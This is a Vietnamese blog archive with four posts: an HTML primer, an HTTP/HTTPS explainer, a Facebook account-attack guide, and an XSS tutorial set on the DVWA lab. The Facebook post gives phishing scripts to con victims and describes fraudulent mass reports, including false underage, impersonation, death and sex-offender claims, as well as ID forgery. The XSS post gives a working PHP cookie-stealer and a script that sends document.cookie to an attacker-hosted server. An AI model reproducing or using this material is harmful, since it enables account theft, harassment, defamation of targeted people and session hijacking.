Thứ Hai, 24 tháng 8, 2015

HTML

Chào mừng bạn đến với thế giới HTML, và đây cũng là phần mở đầu để bạn biết rõ HTML là gì và nó được ứng dụng ra sao, hiểu được vì sao nó lại quan trọng dù bạn là người làm website chuyên nghiệp hay nghiệp dư đều phải biết qua nó. Thậm chí những người làm công việc không mấy liên quan như Biên tập viên cũng cần nên biết HTML, tại sao ư? Hồi sau sẽ rõ.

HTML là gì?
HTML là chữ viết tắt của cụm từ HyperText Markup Language1) (dịch là Ngôn ngữ đánh dấu siêu văn bản) được sử dụng để tạo một trang web, trên một website có thể sẽ chứa nhiều trang và mỗi trang được quy ra là một tài liệu HTML (thi thoảng mình sẽ ghi là một tập tin HTML). Cha đẻ của HTML là Tim Berners-Lee, cũng là người khai sinh ra World Wide Web và chủ tịch của World Wide Web Consortium (W3C – tổ chức thiết lập ra các chuẩn trên môi trường Internet).
Một tài liệu HTML được hình thành bởi các phần tử HTML (HTML Elements) được quy định bằng các cặp thẻ (tag), các cặp thẻ này được bao bọc bởi một dấu ngoặc ngọn (ví dụ <html>) và thường là sẽ được khai báo thành một cặp, bao gồm thẻ mở và thẻ đóng (ví <strong> dụ </strong> và ). Các văn bản muốn được đánh dấu bằng HTML sẽ được khai báo bên trong cặp thẻ (ví dụ <strong>Đây là chữ in đậm</strong>). Nhưng một số thẻ đặc biệt lại không có thẻ đóng và dữ liệu được khai báo sẽ nằm trong các thuộc tính (ví dụ như thẻ<img>).
Một tập tin HTML sẽ bao gồm các phần tử HTML và được lưu lại dưới đuôi mở rộng là .html hoặc .htm.
HTML được xử lý ra sao?
Khi một tập tin HTML được hình thành, việc xử lý nó sẽ do trình duyệt web đảm nhận. Trình duyệt sẽ đóng vai trò đọc hiểu nội dung HTML từ các thẻ bên trong và sẽ chuyển sang dạng văn bản đã được đánh dấu để đọc, nghe hoặc hiểu (do các bot máy tính hiểu).
Để kiểm tra, bạn có thể sử dụng khung nội dung bên dưới và chuyển qua lại giữa phần HTML và Result để xem kết quả của một tập tin HTML sau khi được xử lý.

Cấu trúc một đoạn HTML
Như mình đã nói ở trên, HTML sẽ được khai báo bằng các phần tử bởi các từ khóa. Nội dung nằm bên trong cặp từ khóa sẽ là nội dung bạn cần định dạng với HTML. Ví dụ dưới đây là một đoạn HTML khai báo một đoạn văn bản.
01<p>Đây là một đoạn văn bản trong HTML.</p>
Ngoài ra, trong các thẻ còn có các thuộc tính, thuộc tính sẽ đặt bên trong thẻ mở đầu, mỗi thuộc tính sẽ có giá trị được đặt trong dấu ngoặc kép và cách nhau bởi dấu bằng (=) với tên thuộc tính. Ví dụ dưới đây là một thẻ có sử dụng thuộc tính-
01<form action="http://thachpham.com"> </form>
Một thẻ có thể sử dụng nhiều thuộc tính chứ không phải chỉ một thuộc tính nhé.

Dùng chương trình gì để tạo tập tin HTML?

HTML là một tập tin siêu văn bản nên bạn có thể dùng các chương trình soạn thảo văn bản không có chức năng định dạng văn bản để tạo ra một tập tin HTML. Trong Windows, bạn có thể dùng Notepad để tạo ra một tập tin HTML, còn trên Mac thì có thể dùng TextEdit và Vim trên các hệ điều hành Linux khác. Miễn là sau đó bạn phải lưu tập tin thành đuôi .html và sử dụng trình duyệt website để đọc nó.
HTML có thể được soạn thảo bởi bất kỳ một trình soạn thảo văn bản đơn giản.HTML có thể được soạn thảo bởi bất kỳ một trình soạn thảo văn bản đơn giản.
Tuy nhiên Notepad lại quá đơn giản để sử dụng cho mục đích soạn thảo, nên từ các bài sau chúng ta sẽ dùng một chương trình khác tương tự để soạn thảo HTML. Và mình cũng không bao giờ khuyến khích bạn sửa một tập tin HTML bất kỳ bằng chương trinh Notepad để tránh gặp các lỗi hiển thị ký tự tiếng Việt.

HTML đóng vai trò gì trong website?

Như mình đã nói, HTML là một ngôn ngữ đánh dấu siêu văn bản nên nó sẽ có vai trò xây dựng cấu trúc siêu văn bản trên một website, hoặc khai báo các tập tin kỹ thuật số (media) như hình ảnh, video, nhạc.
Vai trò của từng ngôn ngữ trong websiteVai trò của từng ngôn ngữ trong website
Điều đó không có nghĩa là chỉ sử dụng HTML để tạo ra một website mà HTML chỉ đóng một vai trò hình thành trên website. Ví dụ một website như Thachpham.com sẽ được hình thành bởi:
         HTML – Xây dựng cấu trúc và định dạng các siêu văn bản.
         CSS – Định dạng các siêu văn bản dạng thô tạo ra từ HTML thành một bố cục website, có màu sắc, ảnh nền,….
         Javascript – Tạo ra các sự kiện tương tác với hành vi của người dùng (ví dụ nhấp vào ảnh trên nó sẽ có hiệu ứng phóng to).
         PHP – Ngôn ngữ lập trình để xử lý và trao đổi dữ liệu giữa máy chủ đến trình duyệt (ví dụ như các bài viết sẽ được lưu trong máy chủ).
         MySQL – Hệ quản trị cơ sở dữ liệu truy vấn có cấu trúc (SQL – ví dụ như các bài viết sẽ được lưu lại với dạng dữ liệu SQL).
Nhưng ở đây, tạm thời bạn chỉ cần quan tâm đến HTML mà thôi. Dễ hiểu hơn, bạn hãy nghĩ rằng nếu website là một cơ thể hoàn chỉnh thì HTML chính là bộ xương của cơ thể đó, nó như là một cái khung sườn vậy.
Như vậy, dù website thuộc thể loại nào, giao tiếp với ngôn ngữ lập trình nào để xử lý dữ liệu thì vẫn phải cần HTML để hiển thị nội dung ra cho người truy cập xem.
Nhân tiện đây mình cũng nói luôn, website có hai loại chính:
         Website tĩnh (static web) – Là một website không giao tiếp với máy chủ web để gửi nhận dữ liệu mà chỉ có các dữ liệu được khai báo sẵn bằng HTML và trình duyệt đọc.
         Website động (dynamic web) – Là một website sẽ giao tiếp với một máy chủ để gửi nhận dữ liệu, các dữ liệu đó sẽ gửi ra ngoài cho người dùng bằng văn bản HTML và trình duyệt sẽ hiển thị nó. Để một website có thể giao tiếp với máy chủ web thì sẽ dùng một số ngôn ngữ lập trình dạng server-side như PHP, ASP.NET, Ruby,..để thực hiện. Ví dụ như một website làm bằng WordPress là website động.

Thứ Tư, 12 tháng 8, 2015

Tổng hợp tấn công và bảo vệ tài khoản trên fb

<!--Facebook Hacking-->
// Bài viết tổng hợp trên kinh nghiệm cá nhân và từ nhiều nguồn. ACE tham khảo và đóng góp thêm Smile

*Khái niệm cơ bản.
1. Check: kiểm tra tài khoản cần tấn công(victim). ( tên, ngày tháng năm sinh, quê quán, id đăng nhập,..và nhiều thứ ta cần biết về victim).
2. R.I.P nick: làm cho nick bị khóa hoặc chết qeo không mở được luôn. :v
3. F.A.Q: hay nói theo tiếng việt nam là nick bị vô hiệu hóa.
4. Report: báo cáo 1 ai đó sai phạm hoặc muốn r.i.p ai đó.
5. Unlock: mở khóa nick. mở faq. Smile
mà thoi, vậy châc đủ để hiểu rồi ^^

*Đánh cắp mật khẩu
Theo bản thân mình (Sector404vn) thì gồm có các cách sau: phishing login facebook ( giả mạo trang đăng nhập FB), 
bruteforce password ( đoán từng mật khẩu), 
social engineering (kỹ năng xã hội, lừa gạt, dụ dỗ victim).
Mình không nói đến cách dùng keylog, trojan...hay bất kỳ malware nào để đánh cắp vì lỡ victim không dùng pc, mà dùng phone như nokia để online thì sao =]].

Ở bài viết này, sectot404vn sẽ nói rõ hơn về cách cuối. vì 2 cách kia đã có google nói giúp rồi. Smile)

-hướng dẫn tạo trang phishing facebook:
http://www.google.com.vn/search?q=huong dan tao trang phishing facebook

-code python brute force password facebook:
http://www.google.com/m?q=code python brute force password facebook

http://mastermehar.blogspot.in/2014/06/h...force.html

ok, google dịch nếu không rành tiếng anh, Smile
Social engineering ở đây là gì?
Sector404vn đã từng kết hợp thành công cách này
với trang giả login Fb. 
ờm, vd attack 1 nick:
-> đã add friend: tốt quá, inbox victim và dụ nó click vào link trang lừa đảo.
->chưa add friend: cần tìm ra số điện thoại, mail, forum victim hay lui tới hay bất kỳ cách nào có thể "nói chuyện được", sau đó pm ngay và dụ.
Ơ thế dụ sao?
tất nhiên là ta đã tạo ra trang phishing,!
vd về 1 cuộc trò chuyện:
attacker: chào bạn Xxx ( tên fb kèm tên thật càng tốt)
tài khoản facebook của bạn đang gặp 1 số vấn đề, chúng tôi có thể xóa tài khoản của bạn nếu bạn không xác minh trong 24h tới.
để xác minh những thông tin trên là sai. truy cập http://...link của mình
Fb team. thân!
// hoặc là vấn đề về hack like, sub,...

-> nếu victim reply tin nhắn mà có vẻ nai nai tơ thì sắp ăn rồi, việc còn lại là dẫn dụ họ vào link của các bạn.
->nếu victim ko reply hoặc rành về công nghệ thông tin thì chuyển sang đoán pass thần chưởng ( cách 2 ở trên) :v
=> những cách này giúp bạn lấy password của họ mà họ sẽ không hay biết. phần sau sẽ là rip nick, hoặc đánh cắp mật khẩu bằng cách thay đổi mật khẩu cũ.

*R.I.P
//làm vào lúc tối khuya để nhanh thành công vì giờ đó fb team mới dậy làm việc (bên mỹ mà ).
gồm có: 
->rip nick 13 tuổi:
Tải: https://chrome.google.com/webstore/detai...bamcagfhlo
Vào link trên cài Manual Geolocation vào Chrome . Cài xong click vào icon Manual gõ ” New Zeland ” rồi ấn Search
Vào: https://chrome.google.com/webstore/detai...hfjgkhfcgf
Ấn miễn phí, chọn ok nhấp vô icon chọn iphone
Làm theo bên dưới
Bước 1: Bạn đăng nhập vào tài khoản
Bước 2: Bạn truy cập vào địa chỉ facebook này, để báo cáo sai phạm:
https://www.facebook.com/help/contact/209046679279097
nhấn F5 cái đã ^^
Bước 3: Lúc này sẽ fb hiện ra xuất hiện 4 ô trống.
– Ô thứ nhất: Copy vs Dán địa chỉ người cần Report
–Ô thứ hai: Viết tên người cần Report
– Ô thứ ba: Click chọn 9 năm…
– Ô thứ tư: Bạn dán dòng chữ này vào:” I think this child do not old to use Facebook, thanks you. ”
Bước 4: Bạn bấm gửi…Thế là xong !!!

-> rip 14 tuổi
Đầu tiên các bạn vào link sau:
https://www.facebook.com/help/contact/1408156889442791
Nó sẽ hiện ra 4 dòng như sau
Dòng 1 : Copy vs Dán địa chỉ người cần Report
Dòng 2 : Viết tên người cần Report
Dòng 3 : Chỉnh Thành 11 Tuổi
Dòng 4 : Coppy lại đoạn này và past vào
– Hi Facebook Team
– That child did wrong year of Birth To sign up for Facebook
– I request Facebook Team delete that account as terms Facebook set out, 
– Thank you Facebook team
Xong rồi nhấn gửi……!
Nhớ fake ip sang ko ré à để thàng.công cao nha Smile

->rip giả mạo
Chuẩn bị 1, 2 acc lập trước năm 2007, hay 2008 cũng được, miễn trước nick cần report.
Vào đổi avt cover giống acc nạn nhân.
Vào wall nạn nhân => nhấp dấu 3 chấm=> báo cáo/chặn => Tích chọn gửi báo cáo => Tích “báo cáo sai phạm tài khoản của .. ” => ấn xác nhận => Tích “dòng thừoi gian này đang mạo danh tôi hoặc người tôi biết ..” => chọn “giả vờ là tôi ”=> nhấp tiếp tục =>tích ô gửi báo cáo => chọn tiếp tục => Chọn đồng ý

-> rip lừa tình
Cách rip này có lẽ ít người biết đến..
Cách này là nạn nhân tự giết mình.
Chỉ mấy thèn ngu và kém hiểu biết mới die thôi.
Đầu tiên Đăng stt y như thế này luôn nhé:
” Hướng dẫn chống nạn report hoặc bị rip 13t, 14t, tình dục.
Phương pháp fake ngày sinh (PP An toàn và dễ sử dụng nhất)
Vào links: https://www.facebook.com/help/contact/233841356784195
Chọn ngày , tháng, bất kỳ
Riêng năm chọn 2002 (Phải chọn năm 2002)
Lí do : Năm thật của tôi, Facebook team hãy xác nhận
Nhấn nút Gửi
Sau 3 phút F5 thì Fake ngày sinh đã thành công Ngày sinh của bạn sẽ được fake và chống được nạn report ngày càng gia tăng
Share cho nhau để cùng mọi người chốngnạn report ngày càng tăng. ”Cách trên là giết acc hàng loạt.Hoặc bạn có thể inbox gửi cho 1 ng nào đó. Dụ sao để nạn nhân làm như trên là ok".
Cách trên là khi nạn nhân chọn năm 2002 xong gửi đi thì facebook sẽ xóa ngay fb của nạn nhân. Vì tự mình xác nhận là chưa đủ tuổi dùng fb. =]]

->rip người chết
Vào đây. https://www.facebook.com/help/contact/191122007680088
điền tên nick, link profile của victim, kết bạn với victim càng tốt. 

->rip bằng số đông
chuẩn bị khoản 20 nick, hoặc nhờ 20 thằng bạn, cứ cách 30 phút lại vào nick victim report 1 lần, cho dù tài khoản có tốt mà bị report bởi nhiều người khác nhau với nhiều ip khác nhau thì cũng sớm die thôi. hehe Smile)
"Vào wall nạn nhân, nhấp vào cái ô có 3 chấm ... xong chọn : Báo cáo/chặn => gửi báo cáo => tích vào ô : Báo cáo sai phạm tài khoản của ... =>Xác nhận=> chọn Nhật kí này chứa toàn nội dung không phù hợp=> Tích ô : Tình dục => tiếp tục => Tích ô gửi báo cáo !"

->rip qua websex 
Vào https://www.facebook.com/help/contact/207005222725325
– Địa chỉ email của bạn: điền mail mình vô
– Full name of the person you’d like to report: điền tên tài khoản cần RIP ( full name trên info )
– Web address (URL) of the Timeline you’d like to report ( copy URL victim bỏ vô )
– State, province or country in which thisperson was convicted –> việt nam )
– Do you have documentation? Please note that we require documentation verifying this user as a convicted sex offender (ex: a listing in a national sex offender registry, a court document, or an online news article). ( yes)
What is the type of documentation you’d like to submit?
Link to the national or state sex offender registry
Link to a court document or court records
Link to a news article Link to a third party website that hosts publicly available information (ex: arrest or charge details)
—> ( chọn Link to a news article )
Nó sẽ ra: Web address (URL) verifying the user’s status as a convicted sex offender ( kiếm đại 1 bài báo nào trên pháp luật hay zing…. về hiếp dâm…)
Additional relevant information Ex: Is thisperson using a fake name? ( viết : This is person using a fake name )

->rip log out
https://vi-vn.facebook.com/help/contact/237843336274237 
thay 1 cái cmnd ko khớp tên 24h sau nick bị đình chỉ login..

=> chỉ biết nhiêu này, 1 phần có coppy, bác nào biết thêm thì inbox để mình cập nhật thêm nha.

*Unlock, mở khóa rip, FAQ, bảo vệ tài khoản.
Nên up cmnd trùng tên fb. hoặc photoshop tên trong cmnd trùng tên facebook. (google tìm phôi cmnd trắng mà làm). 
google dùm nè:
http://www.google.com/m?q=huong dan fake cmnd doi ten fb

link up cmnd kèm đổi tên: 
https://www.facebook.com/help/contact/245617802141709

Sau nhiều lần điền form và gửi hình chụp CMND và bằng lái xe ko đc nó phản hồi, chủ động gửi email và ảnh cmnd đến địa chỉ:
gnqxifr.aeaqxnp7lewqg@support.facebook.com
có thể sẽ ok. 

Vì giới hạn bài viết nên tạm thời thế đã, có điều kiện mình sẽ up thêm về mở khóa rip 13, 14 tuổi, mở Faq..

End!

nguồn <Sector404vn>

Thứ Tư, 5 tháng 8, 2015

HTTP, HTTPS là gì?

HTTP Ở KHẮP MỌI NƠI, VẬY HTTP LÀ GÌ?
Với những người thường xuyên sử dụng internet, cụm từ HTTP có lẽ đã trở nên quá quen thuộc. Nó quen thuộc đến nỗi nhiều người thường xuyên đọc và sử dụng chúng nhưng lại không hề biết đến ý nghĩa của cụm từ này. Vậy HTTP kỳ thực là gì?
HTTP là chữ viết tắt của HyperText Transfer Protocol (giao thức truyền tải siêu văn bản). Đây là một giao thức ứng dụng trong bộ các giao thức TCP/IP (gồm một nhóm các giao thức nền tảng cho internet).
HTTP hoạt động dựa trên mô hình Client – Server. Trong mô hình này, các máy tính của người dùng sẽ đóng vai trò làm máy khách (Client). Sau một thao tác nào đó của người dùng, các máy khách sẽ gửi yêu cầu đến máy chủ (Server) và chờ đợi câu trả lời từ những máy chủ này. Để có thể nói chuyện được với nhau, các máy chủ và máy khách phải thực hiện việc trao đổi thông qua các giao thức. Một trong những giao thức được sử dụng thường xuyên nhất chính là HTTP.
HTTP là chữ viết tắt của HyperText Transfer Protocol (giao thức truyền tải siêu văn bản). Đây là một giao thức ứng dụng trong bộ các giao thức TCP/IP (gồm một nhóm các giao thức nền tảng cho internet).
Khi bạn gõ một địa chỉ Web URL vào trình duyệt Web, một lệnh HTTP sẽ được gửi tới Web server để ra lệnh và hướng dẫn nó tìm đúng trang Web được yêu cầu. Trang Web này sau đó sẽ được kéo về và mở trên trình duyệt Web. Nói đơn giản hơn, HTTP là giao thức giúp cho việc truyền tải file từ một Web server vào một trình duyệt Web để người dùng có thể xem một trang Web đang hiện diện trên trình duyệt.
ẨN HỌA TỪ HTTP VÀ SỰ CẦN THIẾT CỦA HTTPS
Được sử dụng một cách rộng rãi là vậy nhưng HTTP chứa đựng trong nó không ít những điểm hạn chế. Khi bạn tiến hành thực hiện việc truy nhập vào một trang Web thông qua giao thức HTTP, trình duyệt sẽ thực hiện các phiên kết nối đến Server của trang Web đó thông qua địa chỉ IP do hệ thống phân giải tên miền DNS cung cấp.
Trong quá trình kết nối và trao đổi thông tin, trình duyệt của bạn sẽ mặc nhiên thừa nhận địa chỉ IP đó đến từ Server của chính Website mà bạn muốn truy nhập mà không hề có biện pháp xác thực nào. Các thông tin được chuyển đi qua giao thức HTTP (bao gồm địa chỉ IP của bạn, các thông tin mà bạn nhập liệu trên Website…) cũng không hề được mã hóa và bảo mật.
Điều này dẫn đến những nguy cơ về việc phiên kết nối của bạn tới máy chủ của Website có thể bị “nghe lén”, hoặc việc truy nhập của bạn bị chuyển hướng đến một trang Web giả danh với thiết kế giống hệt Website gốc mà người sử dụng không hề hay biết.

Ăn cắp thông tin đã trở thành một nỗi lo sợ chung với người dùng internet (Ảnh: Internet)
Nếu bạn thường xuyên sử dụng các dịch vụ ngân hàng trực tuyến, bạn sẽ thấy khi truy nhập vào địa chỉ tên miền của ngân hàng, giao thức mà nó sử dụng sẽ là HTTPS thay vì HTTP như ở những trang web thông thường. Điều này là bởi, phiên bản nâng cấp HTTPS của HTTP được sử dụng nhằm tăng cường khả năng bảo mật thông tin sau mỗi lần truy nhập.
HTTPS là tên viết tắt của "Hypertext Transfer Protocol Secure". Đây là một sự kết hợp giữa giao thức HTTP và giao thức bảo mật SSL hay TLS. HTTPS giúp cho việc trao đổi thông tin một cách bảo mật trên nền Internet.
Các trang giao dịch điện tử lớn như Paypal đều đang sử dụng giao thức HTTPS
Khác với HTTP, HTTPS sẽ hỗ trợ việc xác thực tính chính danh của các Website mà người dùng truy nhập thông qua việc kiểm tra xác thực bảo mật (security certificate). Các xác thực bảo mật này được cung cấp và xác minh bởi các CA (Certificate Authority) có uy tín. Với các xác thực từ CA, người sử dụng có thể biết rằng mình đã truy nhập đúng vào Website cần truy nhập chứ không phải một Website giả danh bất kỳ nào khác.
Bên cạnh đó, các phiên kết nối giữa trình duyệt của bạn đến Server đều sẽ được mã hóa. Điều này sẽ giúp che giấu địa chỉ IP của bạn và những thông tin nhập liệu về tài khoản của bạn trên Website khỏi sự nhòm ngó của các hacker. HTTPS không đem đến sự an toàn 100%. Tuy vậy, đây là biện pháp bảo mật hữu hiệu thay vì việc sử dụng giao thức HTTP truyền thống vốn đầy rủi ro sẵn có.
ĐIỀU NGƯỜI DÙNG INTERNET CẦN LƯU Ý
Rõ ràng việc sử dụng giao thức HTTPS giúp tăng cường khả năng bảo mật và phòng vệ đáng kể cho người dùng internet. Cũng chính bởi điều này, các hệ thống ngân hàng, tổ chức tín dụng… đều sử dụng giao thức HTTPS trên các Website của mình. Điều này cũng đã được sự hưởng ứng của cả Google và Facebook.
Với người dùng internet, điều mà bạn cần lưu ý khi truy nhập vào các hệ thống thanh toán điện tử hoặc các website yêu cầu việc nhập liệu những thông tin nhạy cảm về người dùng nằm ở chính giao thức mà Website đó sử dụng. Ở các doanh nghiệp hoặc các hệ thống thanh toán điện tử uy tín, việc sử dụng giao thức HTTPS gần như là một trong những yêu cầu bắt buộc đối với các doanh nghiệp này. Bởi vậy việc không sử dụng giao thức HTTPS đồng nghĩa với việc bạn phải xếp Website đó vào diện nghi vấn. Rất có thể, đây chỉ là một trang Web giả danh nhằm lấy đi thông tin về tài khoản của bạn.
Các Website giao dịch trực tuyến của các ngân hàng tại Việt Nam đều sử dụng giao thức HTTPS
Để kiểm tra một Website có sử dụng giao thức HTTPS hay không cũng vô cùng đơn giản. Các bạn chỉ cần để ý đến phần link đường dẫn khi truy nhập vào Website mở đầu bằng http:// hay https://. Bên cạnh đó, link đường dẫn của các Website có sử dụng giao thức HTTPS thường đi kèm với một biểu tượng nhỏ hình ổ khóa. Khi đưa con trỏ chuột hướng vào biểu tượng này, trên đó sẽ hiện ra tên của đơn vị xác thực (CA) như đã nói ở trên. Đây là dấu hiệu cho thấy Website mà bạn đang truy nhập không phải là giả mạo.
Chỉ như vậy thôi rõ ràng là chưa đủ cho việc đảm bảo an toàn thông tin trên internet. Tuy nhiên với những điều cơ bản này, các bạn cũng sẽ phần nào hiểu được cách thức mà các Website hoạt động và có cho mình những kinh nghiệm cơ bản nhất để tự bảo vệ chính bản thân mình.

Khai thác lỗ hổng XSS

Khai thác lỗ hổng XSS với Xenotix (DVWA)

Xenotix XSS Exploit Framework là một công cụ thử nghiệm xâm nhập để phát hiện và khai thác lỗ hổng XSS trong ứng dụng web. Công cụ này có thể tiêm các đoạn mã và một trang web mà nó có khả năng bị tổn thương tới lỗ hổng XSS. Nó là cơ bản là một danh sách các payload dựa trên các XSS Scanner và XSS Exploitation. Nó cung cấp cho người thử nghiệm xâm nhập khả năng để kiểm tra tất cả các XSS payloads có sẵn trong danh sách để tấn công ,ứng dụng web cho quá trình kiểm tra lỗ hổng XSS. Công cụ hỗ trợ cả chế độ tự động và chế độ bằng tay. XSS Exploit Framework bao gồm các công cụ XSS encoder, XSS keystroke logger, Executable Drive-by downloader, XSS Reverse Shell và XSS DDoSer.



****Dưới đây là cách khai thác lỗ hổng XSS (cơ bản).

**Phần 1:Test lỗi.
1.Đầu tiên ta cần cài đặt DVWA.Link hướng dẫn ở đây http://svuit.com/showthread.php?109-...-lab-with-DVWA.

2.Sau đó ta vào thư mục cài đặt DVWA

Tìm file .htaccess edit lai :

# Limit access to localhost
<Limit GET POST PUT>
order deny,allow
deny from all ---------> Sửa thành allow from all
allow from 127.0.0.1
</Limit>


3.Tìm file index.php theo đường dẫn sau: dvwa\vulnerabilities\xss-s\index.phptìm:

<div class=\"body_padded\"> -----> <textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"50\"></textarea></td>

sửa maxlength từ 50 thành 200 như:

<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"200\"></textarea></td>

4.Vào web browser mở http://www.localhost/dvwa login vs username: admin password: password(mặc định nếu mốn ta có thể thay đổi sau).

5.Vào setup->Creat/reset database để tạo mới database nếu thành công thì sẽ có thông báo: database has been created....

6.Chỉnh DVWA security từ high xuống low.Đây là mức bảo mật thấp nhất.Ta nên bắt đầu từ đây.

7.Vào xss storage

8.Sử dụng một số đoạn script cơ bản để soát lỗi xss cho website:
<script>alert("XSS")</script>
<script>alert("XSS")</script>
<script>alert(String.fromCharCode(88,83,83)</script>
<script>alert("XSS")</script>
<script>alert(String.fromCharCode(88,83,83)</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt><aLeRT(String.fromCharCode(88,83,83)</ScRIPt>
Sau khi phát hiên ra những lỗ hổng ta chuyển qua phần 2.

Phần 2.Sau khi phát hiện ra lỗi ta tấn công bang css

12*1.Tạo file cc.php để lấy cookies

Nội dung file cc.php nhu sau:
Code:
<?php
$cookie=$HTTP_GET_VAR["cookie"];  //Lấy cookie từ địa chỉ hiện tại và lưu trữ cookie trong biến $cookie
$steal=fopen("logs.txt","a");               //Mở cookiefile để đính kèm các cookie lấy được
fwrite($steal,$cookie."\n");                //Viết lại những cookie lấy được lưu trong file $steal
fclose($steal);                                 //Đóng lại cookiefiles.
?>
file này có nhiệm vụ lấy cookies và ghi thông tin lên file logs.txt

Sau đó tạo file logs.txt.
Lưu ý phải chmod file logs.text về 777

12*2.Up các file cc.php và logs.text lên host

(Lưu ý đây là host do attacker tạo ra. Các bạn có thể tạo host free trên trang www.000webhost.com)


12*3.Khai thác lỗ hổng css

Chèn đoạn script độc vào textbox rồi gửi đi.

Giả sử ta upload 2 file lên host của site có địa chỉ như sau: http://www.xss.com thì đoạn script có dạng như sau:
<script>location.href='http://www.xss.com/cc.php?cookie='+document.cookie;</script>
Chèn đoạn mã đó vào site dính lỗi xss.Khi admin view site thi cookie se duoc gui ve cho attacker.

Kiểm tra file log trên web.

Bước cuối cùng.Khai thác cookies lấy được.